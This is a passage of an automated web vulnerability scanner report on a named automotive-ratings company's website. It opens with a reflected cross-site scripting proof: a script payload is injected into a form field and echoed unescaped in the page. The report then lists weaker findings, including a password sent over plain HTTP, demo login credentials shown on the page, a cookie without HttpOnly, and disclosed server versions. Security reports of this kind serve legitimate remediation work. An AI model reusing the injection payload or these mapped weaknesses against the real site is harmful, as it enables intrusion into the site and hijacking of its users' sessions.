Cookie: PHPSESSID=ucd796b5je81rs2nedvc06vr12
Content-Length: 197
Expect: 100-continue
Accept-Encoding: gzip, deflate

Year=3&Make=3&numCars=3&yr1=3&mk1=3&mo1=3&yr2=3&mk2=3&mo2='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000FE7)%3c%2fscript%3e&yr3=3&mk3=3&mo3=3&yr4=3&mk4=3&mo4=3&yr5=3&mk5=3&mo5=3

Response

HTTP/1.1 200 OK
Date: Thu, 28 Jul 2011 02:57:42 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html


<html xmlns="http://www.w3.org/1999/xhtml"><head><title>Strategic Vision - Consumer Automotive Ratings</title><script type="text/javascript" language="JavaScript" src="scripts/ratings.js"></script><style type="text/css"><!--.style4 {color: #D9740F}--></style><!--META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"--><link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon" /><link rel="stylesheet" href="format.css" type="text/css" /><link rel="stylesheet" href="navbar.css" type="text/css" /><script language="JavaScript" type="text/javascript" src="scripts/functions.js"></script><script language="JavaScript" type="text/javascript" src="scripts/navbar.js"></script></head><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-1931555-7");pageTracker._trackPageview();} catch(err) {}</script><meta name="google-site-verification" content="co3cp8LCCaiJv7xvKXlDyD1GnS4aS8p2ytrk5iiNcxk" /><body style="background-color: #CCCCCC;"> <a name="top"></a> <div id="pagehead"> <table border="0" cellpadding="0" cellspacing="0" width="790" height="71" align="center" class="text"> <tr> <td bgcolor="#003466">&nbsp;</td> <td align="left" width="480" background="images/pagehead_highlight.png"> <div id="logo"><a href="index.php"><img src="images/sv_logo.png" alt="Strategic Vision" width="195" height="70" border="0" title="Strategic Vision" /></a></div> </td> <td valign="bottom" align="right" width="300" class="userinfo" background="images/pagehead_highlight.png"> <p> &nbsp;</p> </td> <td bgcolor="#003466">&nbsp;</td> </tr> </table></div> <center> <div id="toolbar" style="z-index=1;"> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center"><tr> <td width="5">&nbsp;</td> 
<td width="780"> <div id="topNav" class="navBar"> <!-- HOME --> <div class="collapsed"> <div class="navItem"><a href="index.php">HOME</a></div> </div> <!-- CONSUMERS --> <div class="collapsed"> <div class="navItem"><a href="consumers.php">CONSUMERS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="ratings.php">Automotive Ratings</a></div> <div class="dropItem"><a href="auto_research.php">About our Ratings</a></div> <!--<div class="dropItem"><a href="consumers_carbuyingtips.php">Car Buying Tips</a></div>--> <div class="dropItem"><a href="surveys.php">Surveys</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="sweepstakes_winners.php">Sweepstakes</a></div> </div> </div> </div> <!-- RESEARCH --> <div class="collapsed"> <div class="navItem"><a href="research.php">RESEARCH</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="auto_research.php">Automotive</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="auto_tqa.php">Total Quality</a></div> <div class="dropItem"><a href="auto_tvi.php">Total Value</a></div> <div class="dropItem"><a href="auto_delight.php">Delight</a></div> <div class="dropItem"><a href="auto_pim.php">Problem Impact</a></div> <div class="dropItem"><a href="auto_ethnic_report_2006.php">Ethnic Report</a></div> </div> </div> <div class="dropItem"><a href="govt_research.php">Government</a></div> <div class="dropItem"><a href="jury_research.php">Jury</a></div> <div class="dropItem"><a href="org_intervention.php">Organizational Intervention</a></div> <div class="dropItem"><a href="via_research.php">Values In America</a></div> <div class="rule"></div> <div class="dropItem"><a href="method.php">ValueCentered Method</a></div> </div> </div> </div> <!-- RATINGS --> <div 
class="collapsed"> <div class="navItem"><a href="services.php">SERVICES</a></div> </div> <!-- METHOD --> <div class="collapsed"> <div class="navItem"><a href="method.php">METHOD</a></div> </div> <!-- COMPANY --> <div class="collapsed"> <div class="navItem"><a href="company.php">COMPANY</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="team.php">Team</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="team.php?person=1">Dr. Darrel Edwards</a></div> <div class="dropItem"><a href="team.php?person=8">J. Susan Johnson</a></div><div class="dropItem"><a href="team.php?person=9">Sharon D. Shedroff</a></div><div class="dropItem"><a href="team.php?person=11">Alexander H. Edwards</a></div><div class="dropItem"><a href="team.php?person=12">Alex Hare</a></div><div class="dropItem"><a href="team.php?person=13">Charles Borough</a></div><div class="dropItem"><a href="team.php?person=14">Christopher Chaney</a></div><div class="dropItem"><a href="team.php?person=30">Margo Jay</a></div> </div> </div> <div class="dropItem"><a href="clients.php">Clients</a></div> <div class="dropItem"><a href="charity.php">Charity</a></div> <div class="rule"></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> </div> </div> </div> <!-- CLIENTS --> <div class="collapsed"> <div class="navItem"><a href="clients.php">CLIENTS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="clients.php">Past Clients</a></div> <!--<div class="dropItem"><a href="clients.php">Success Stories</a></div>--> <!--<div class="dropItem"><a href="client_dao_login.php">DAO Login</a></div>--> </div> </div> </div> <!-- PRESS --> <div class="collapsed"> <div class="navItem"><a href="press.php">PRESS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div 
class="dropItem"><a href="press_auto.php">Automotive Press</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> <div class="dropItem"><a href="press_rss.php">RSS Feeds</a></div> </div> </div> </div> </div> </td> <td width="5">&nbsp;</td> </tr></table></div> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center" height="90%"><tr> <td width="5" bgcolor="#CCCCCC" background="images/content_leftshadow.gif">&nbsp;</td> <td width="780" bgcolor="#FFFFFF" valign="top"> <div id="content" class="center_div"> <div style="height:3px;"></div><table width="100%" class="text" cellpadding="5"> <tr> <td width="150" align="left" valign="top"><div class="sidemenu_head">CONSUMERS</div><div class="sidemenu_item"><a href="consumers.php">Car Ratings</a></div><div class="sidemenu_item"><a href="auto_research.php">About Our Ratings</a></div><!--<div class="sidemenu_item"><a href="consumers_carbuyingtips.php">Car Buying Tips</a></div>--><div class="sidemenu_item"><a href="press_auto.php">Automotive Press</a></div><div class="sidemenu_item"><a href="press.php">Press Releases</a></div><div class="sidemenu_item"><a href="press_blogs.php">Blogs</a></div><div class="sidemenu_item"><a href="surveys.php">Survey Login</a></div><div class="sidemenu_head">Sweepstakes</a></div><div class="sidemenu_item"><a href="sweepstakes_winners.php">2010 Contest Winners</a></div><div class="sidemenu_item"><a href="2011_sweepstakes_rules.php">2011 Contest Rules</a></div><br /><br /><div class="sidemenu_head">SITE TOOLS</div><div class="sidemenu_item"><a href="javascript:window.print();"><img src="images/icon_printpage.gif" border="0" height="13" width="12" align="middle">&nbsp; Print This Page</a></div><!--<div class="sidemenu_item"><a href="javascript:emailToAFriend('http://www.strategicvision.com');"><img src="images/icon_email.gif" border="0" height="10" width="12" align="middle">&nbsp; E-mail 
to a Friend</a></div>--><br /><br /><div class="boldtext lighttext">Newsletter Sign-up</div><div class="lighttext">Receive updates from us! Enter your e-mail address:</div><p class="lighttext"> <form name="newsletterSignUp" action="consumers_newsletter_process.php" method="post" class="text"> <input type="text" size="13" maxlength="200" name="email" id="email" class="text" onBlur="trimField(this);" /> <a href="javascript:document.newsletterSignUp.submit();" class="footer">GO</a> </form></p></td> <td align="left" valign="top"> <!-- Start the content --> <div class="pagetitle"><img src="images/pagetitle_dots.gif" width="9" height="10" align="absmiddle" /> <span class="style4">Consumer Automotive Ratings </span></div> <div class="pagetext"> <table width="600" height="148" border="0" cellpadding="0" cellspacing="0" class="text"> <tr> <td height="148" valign="top"> <p><img src="images/3_awards.gif" width="180" height="136" hspace="5" align="right" border="0"><br /> Search hundreds of car ratings obtained by Strategic Vision's renowned New Vehicle Experience Study (NVES) surveys, which gather information from thousands of individuals.</p> <p>Simply choose up to five vehicles that you would like to compare, and click "View Ratings."<br /> <br /> Read more about our automotive research in the <a href="blog.php">Car Blogs</a>!</p> </td> </tr> </table> <table width="600" height="286" cellpadding="0" cellspacing="0"> <tr> <td height="28"><div align="left"><img src="images/car_rating_tab.gif" hspace="1" alt="search car ratings"></div></td> </tr> <tr> <td height="258" style="background: url('images/folder_back.gif') repeat-x;"> <div class="pagetext"> <div class="pagetitle_small" style="font-size:14px">Select your cars:</div> <form name="ratingsSelection" action="consumers.php" method="post"> <table border="0" cellpadding="2" cellspacing="0" class="text"> <tr> <td width="65">Year</td> <td width="135">Manufacturer</td> <td colspan="2" width="200">Model</td> </tr> <tr> <td><select 
name="Year" id="Year" onChange="submit();"><option>---</option><option value="2011">2011</option><option value="2010">2010</option><option value="2009">2009</option><option value="2008">2008</option><option value="2007">2007</option><option value="2006">2006</option><option value="2005">2005</option><option value="2004">2004</option></select></td><td><select name="Make" id="Make" onChange="submit();"><option>---</option></select></td><td><select name="Model" id="Model" onChange="submit();"><option>---</option></select></td> </tr> </table> <div class="pagesubtitle">Your picks:</div> <input type="hidden" name="numCars" id="numCars" size="1" value="3" /> <input type="hidden" name="yr1" id="yr1" value="3" /> <input type="hidden" name="mk1" id="mk1" value="3" /> <input type="hidden" name="mo1" id="mo1" value="'"--></style></script><script>netsparker(0x000FE7)</script>" /> <input type="hidden" name="yr2" id="yr2" value="3" /> <input type="hidden" name="mk2" id="mk2" value="3" /> <input type="hidden" name="mo2" id="mo2" value="3" /> <input type="hidden" name="yr3" id="yr3" value="" /> <input type="hidden" name="mk3" id="mk3" value="" /> <input type="hidden" name="mo3" id="mo3" value="" /> <input type="hidden" name="yr4" id="yr4" value="" /> <input type="hidden" name="mk4" id="mk4" value="" /> <input type="hidden" name="mo4" id="mo4" value="" /> <input type="hidden" name="yr5" id="yr5" value="" /> <input type="hidden" name="mk5" id="mk5" value="" /> <input type="hidden" name="mo5" id="mo5" value="" /> </form> <table border="0" class="text boldtext"> <tr><td>1.</td><td width="300"><span id="car1"></span></td><td><span id="c..
Password Transmitted Over HTTP

1 TOTAL | IMPORTANT | 1 CONFIRMED
Netsparker identified that password data is sent over HTTP.

Impact

If an attacker can intercept network traffic, he/she can steal users' credentials.

Actions to Take

  1. See the remedy for the solution.
  2. Move all of your critical forms and pages to HTTPS and do not serve them over HTTP.

Remedy

All sensitive data should be transferred over HTTPS rather than HTTP. Forms should be served over HTTPS. All aspects of the application that accept user input starting from the login process should only be served over HTTPS.

Classification

OWASP A9, PCI v1.2-6.5.9, PCI v2.0-6.5.4, CWE-311, WASC-04
- /client_dao_login.php

/client_dao_login.php CONFIRMED

http://www.strategicvision.com/client_dao_login.php

Form target action

client_dao_authenticate.php

Request

GET /client_dao_login.php HTTP/1.1
Referer: http://www.strategicvision.com/clients.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.strategicvision.com
Cookie: PHPSESSID=vc79hagebb30pt9ttmk65djgu6
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Thu, 28 Jul 2011 01:49:49 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html


<html xmlns="http://www.w3.org/1999/xhtml"><head><title>Strategic Vision - DAO Login</title><!--META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"--><link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon" /><link rel="stylesheet" href="format.css" type="text/css" /><link rel="stylesheet" href="navbar.css" type="text/css" /><script language="JavaScript" type="text/javascript" src="scripts/functions.js"></script><script language="JavaScript" type="text/javascript" src="scripts/navbar.js"></script></head><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-1931555-7");pageTracker._trackPageview();} catch(err) {}</script><meta name="google-site-verification" content="co3cp8LCCaiJv7xvKXlDyD1GnS4aS8p2ytrk5iiNcxk" /><body style="background-color: #CCCCCC;"> <a name="top"></a> <div id="pagehead"> <table border="0" cellpadding="0" cellspacing="0" width="790" height="71" align="center" class="text"> <tr> <td bgcolor="#003466">&nbsp;</td> <td align="left" width="480" background="images/pagehead_highlight.png"> <div id="logo"><a href="index.php"><img src="images/sv_logo.png" alt="Strategic Vision" width="195" height="70" border="0" title="Strategic Vision" /></a></div> </td> <td valign="bottom" align="right" width="300" class="userinfo" background="images/pagehead_highlight.png"> <p> &nbsp;</p> </td> <td bgcolor="#003466">&nbsp;</td> </tr> </table></div> <center> <div id="toolbar" style="z-index=1;"> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center"><tr> <td width="5">&nbsp;</td> <td width="780"> <div id="topNav" class="navBar"> <!-- HOME --> <div class="collapsed"> <div class="navItem"><a href="index.php">HOME</a></div> </div> <!-- CONSUMERS --> 
<div class="collapsed"> <div class="navItem"><a href="consumers.php">CONSUMERS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="ratings.php">Automotive Ratings</a></div> <div class="dropItem"><a href="auto_research.php">About our Ratings</a></div> <!--<div class="dropItem"><a href="consumers_carbuyingtips.php">Car Buying Tips</a></div>--> <div class="dropItem"><a href="surveys.php">Surveys</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="sweepstakes_winners.php">Sweepstakes</a></div> </div> </div> </div> <!-- RESEARCH --> <div class="collapsed"> <div class="navItem"><a href="research.php">RESEARCH</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="auto_research.php">Automotive</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="auto_tqa.php">Total Quality</a></div> <div class="dropItem"><a href="auto_tvi.php">Total Value</a></div> <div class="dropItem"><a href="auto_delight.php">Delight</a></div> <div class="dropItem"><a href="auto_pim.php">Problem Impact</a></div> <div class="dropItem"><a href="auto_ethnic_report_2006.php">Ethnic Report</a></div> </div> </div> <div class="dropItem"><a href="govt_research.php">Government</a></div> <div class="dropItem"><a href="jury_research.php">Jury</a></div> <div class="dropItem"><a href="org_intervention.php">Organizational Intervention</a></div> <div class="dropItem"><a href="via_research.php">Values In America</a></div> <div class="rule"></div> <div class="dropItem"><a href="method.php">ValueCentered Method</a></div> </div> </div> </div> <!-- RATINGS --> <div class="collapsed"> <div class="navItem"><a href="services.php">SERVICES</a></div> </div> <!-- METHOD --> <div class="collapsed"> <div class="navItem"><a 
href="method.php">METHOD</a></div> </div> <!-- COMPANY --> <div class="collapsed"> <div class="navItem"><a href="company.php">COMPANY</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="team.php">Team</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="team.php?person=1">Dr. Darrel Edwards</a></div> <div class="dropItem"><a href="team.php?person=8">J. Susan Johnson</a></div><div class="dropItem"><a href="team.php?person=9">Sharon D. Shedroff</a></div><div class="dropItem"><a href="team.php?person=11">Alexander H. Edwards</a></div><div class="dropItem"><a href="team.php?person=12">Alex Hare</a></div><div class="dropItem"><a href="team.php?person=13">Charles Borough</a></div><div class="dropItem"><a href="team.php?person=14">Christopher Chaney</a></div><div class="dropItem"><a href="team.php?person=30">Margo Jay</a></div> </div> </div> <div class="dropItem"><a href="clients.php">Clients</a></div> <div class="dropItem"><a href="charity.php">Charity</a></div> <div class="rule"></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> </div> </div> </div> <!-- CLIENTS --> <div class="collapsed"> <div class="navItem"><a href="clients.php">CLIENTS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="clients.php">Past Clients</a></div> <!--<div class="dropItem"><a href="clients.php">Success Stories</a></div>--> <!--<div class="dropItem"><a href="client_dao_login.php">DAO Login</a></div>--> </div> </div> </div> <!-- PRESS --> <div class="collapsed"> <div class="navItem"><a href="press.php">PRESS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="press_auto.php">Automotive Press</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a 
href="press_contacts.php">Press Contacts</a></div> <div class="dropItem"><a href="press_rss.php">RSS Feeds</a></div> </div> </div> </div> </div> </td> <td width="5">&nbsp;</td> </tr></table></div> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center" height="90%"><tr> <td width="5" bgcolor="#CCCCCC" background="images/content_leftshadow.gif">&nbsp;</td> <td width="780" bgcolor="#FFFFFF" valign="top"> <div id="content" class="center_div"> <div style="height:3px;"></div><table width="100%" class="text" cellpadding="5"> <tr> <td width="150" align="left" valign="top"><div class="sidemenu_head">CLIENTS</div><div class="sidemenu_item"><a href="clients.php">Past Clients</a></div><!--<div class="sidemenu_item"><a href="client_success.php">Success Stories</a></div>--><!--<div class="sidemenu_item"><a href="client_dao_login.php">DAO Login</a></div>--><br /><br /><div class="sidemenu_head">SITE TOOLS</div><div class="sidemenu_item"><a href="javascript:window.print();"><img src="images/icon_printpage.gif" border="0" height="13" width="12" align="middle">&nbsp; Print This Page</a></div><!--<div class="sidemenu_item"><a href="javascript:emailToAFriend('http://www.strategicvision.com');"><img src="images/icon_email.gif" border="0" height="10" width="12" align="middle">&nbsp; E-mail to a Friend</a></div>--><br /></td> <td align="left" valign="top"> <!-- Start the content --> <div class="pagetitle"><img src="images/pagetitle_dots.gif" width="9" height="10" align="middle" />&nbsp;DAO Login</div> <div class="pagetext"> <div class="pagesubtitle">Please enter in your DAO User ID and password:</div> <p class="pagetext"> <form action="client_dao_authenticate.php" method="post" name="daoLoginForm" onSubmit="return validateLoginForm(this);"> <table border="0" cellpadding="5" cellspacing="0" class="text"> <tr> <td width="61" class="boldtext">User ID:</td> <td width="289"><input type="text" name="userID" size="20" maxlength="200" onBlur="trimField(this);" /> (use 
&quot;strategic&quot;)</td> </tr> <tr> <td class="boldtext">Password:</td> <td><input type="password" name="password" size="20" maxlength="100" onBlur="trimField(this);" /> (use &quot;vision&quot;)</td> </tr> <tr> <td colspan="2"><input type="submit" name="submitButton" value="Login" /></td> </tr> </table> </form> </p> </div> <!-- End the page --> </td> <!-- optional third column -- > <td width="150" bgcolor="#EEEEEE"> optional page </td> <!-- end optional third column --> </tr></table> <hr noshade size="1" color="#DDDDDD" width="760" align="center" /><table id="footertable" align="center"> <tr> <td align="left" valign="top" width="50%"> <a href="sitemap.php" class="footer">SITE MAP</a> &nbsp; | &nbsp; <!--<a href="privacy.php" class="footer">PRIVACY POLICY</a> &nbsp; | &nbsp; --> <a href="press_contacts.php" class="footer">CONTACT US</a> &nbsp; | &nbsp;<a href="admin.php" class="footer">ADMIN</a> &nbsp; | &nbsp; <a href="privacy.php" class="footer">PRIVACY</a> </td> <td align="right" valign="top" width="50%"> &copy; 2004-2011 Strategic Vision, Inc.<br /> Site by <!--<a href="http://www.nickbarrett.org" title="Nick Barrett" target="_blank" class="footer">Nick Barrett</a> &amp;--><a href="mailto:pgossling@gmail.com" class="footer">Philip Gossling</a> </td> </tr></table> </div> </td> <td width="5" bgcolor="#CCCCCC" background="images/content_rightshadow.gif">&nbsp;</td> </tr></table> </center> </body></html>
Auto Complete Enabled

1 TOTAL | LOW | 1 CONFIRMED
"Auto Complete" was enabled in one or more of the form fields. These were either "password" fields or important fields such as "Credit Card".

Impact

Data entered in these fields will be cached by the browser. An attacker who can access the victim's browser could steal this information. This is especially important if the application is commonly used in shared computers such as cyber cafes or airport terminals.

Remedy

Add the attribute autocomplete="off" to the form tag or to individual "input" fields.

Actions to Take

  1. See the remedy for the solution.
  2. Find all instances of inputs which store private data and disable autocomplete. Fields which contain data such as "Credit Card" or "CCV" type data should not be cached. You can allow the application to cache usernames and remember passwords; however, in most cases this is not recommended.
  3. Re-scan the application after addressing the identified issues to ensure that all of the fixes have been applied properly.

Required Skills for Successful Exploitation

Dumping all data from a browser can be fairly easy, and there are a number of automated tools for this. Where the attacker cannot dump the data, he/she could still browse the recently visited websites and activate the auto-complete feature to see previously entered values.

- /client_dao_login.php

/client_dao_login.php CONFIRMED

http://www.strategicvision.com/client_dao_login.php

Identified Field Name

password

Request

GET /client_dao_login.php HTTP/1.1
Referer: http://www.strategicvision.com/clients.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.strategicvision.com
Cookie: PHPSESSID=vc79hagebb30pt9ttmk65djgu6
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Thu, 28 Jul 2011 01:49:49 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html


Cookie Not Marked As HttpOnly

1 TOTAL
LOW
CONFIRMED
1
The cookie was not marked as HttpOnly. HttpOnly cookies cannot be read by client-side scripts; therefore, marking a cookie as HttpOnly can provide an additional layer of protection against Cross-site Scripting attacks.

Impact

During a Cross-site Scripting attack an attacker might easily access cookies and hijack the victim's session.

Actions to Take

  1. See the remedy for the solution.
  2. Consider marking all of the cookies used by the application as HttpOnly (after this change, JavaScript code will no longer be able to read those cookies).

Remedy

Mark the cookie as HttpOnly. This will be an extra layer of defence against XSS. However, this is not a silver bullet and will not protect the system against Cross-site Scripting attacks. An attacker can use a tool such as XSS Tunnel to bypass HttpOnly protection.

External References

Classification

OWASP A6 PCI v2.0-6.5.4 CWE-16 WASC-15
- /clients.php

/clients.php CONFIRMED

http://www.strategicvision.com/clients.php

Identified Cookie

PHPSESSID

Request

GET /clients.php HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.strategicvision.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Thu, 28 Jul 2011 01:49:14 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=vc79hagebb30pt9ttmk65djgu6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html


Apache Version Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is an Apache server. This was disclosed through the HTTP response. This information can help an attacker gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of Apache.

Impact

An attacker can search for specific security vulnerabilities for the version of Apache identified within the SERVER header.

Remedy

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.

Classification

OWASP A6 PCI v1.2-6.5.6 WASC-13
- /sitemap.xml

/sitemap.xml

http://www.strategicvision.com/sitemap.xml

Extracted Version

2.2.3

Request

GET /sitemap.xml HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.strategicvision.com
Cookie: PHPSESSID=vc79hagebb30pt9ttmk65djgu6
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Thu, 28 Jul 2011 01:49:14 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 15 Dec 2009 21:37:19 GMT
ETag: "23c0c3d-3e5a-31c841c0"
Accept-Ranges: bytes
Content-Length: 15962
Connection: close
Content-Type: text/xml


<loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=TQA&amp;seg=12</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=TQA&amp;seg=13</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=TQA&amp;seg=14</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=TQA&amp;seg=15</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=TQA&amp;seg=16</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=TQA&amp;seg=17</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=TQA&amp;seg=18</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=TQA&amp;seg=19</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=tva&amp;seg=2</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=tva&amp;seg=3</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=tva&amp;seg=4</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=tva&amp;seg=24</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=tva&amp;seg=5</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=tva&amp;seg=6</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=tva&amp;seg=22</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=tva&amp;seg=7</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=tva&amp;seg=8</loc></url><url> 
<loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=tva&amp;seg=9</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=tva&amp;seg=26</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=tva&amp;seg=23</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=tva&amp;seg=20</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=tva&amp;seg=10</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=tva&amp;seg=11</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=tva&amp;seg=12</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=tva&amp;seg=13</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=tva&amp;seg=14</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=tva&amp;seg=15</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=tva&amp;seg=16</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=tva&amp;seg=17</loc></url..
PHP Version Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server discloses the PHP version in use through the HTTP response (the X-Powered-By header in the response shown below). This information helps an attacker understand the systems in use and potentially develop further attacks targeted at that specific version of PHP.

Impact

An attacker can look up known security vulnerabilities for the identified version. The attacker can also combine this information with other vulnerabilities in the application or the web server.

Classification

OWASP A6 PCI v1.2-6.5.6 WASC-13
- /clients.php

/clients.php

http://www.strategicvision.com/clients.php

Extracted Version

PHP/5.1.6

Request

GET /clients.php HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.strategicvision.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Thu, 28 Jul 2011 01:49:16 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
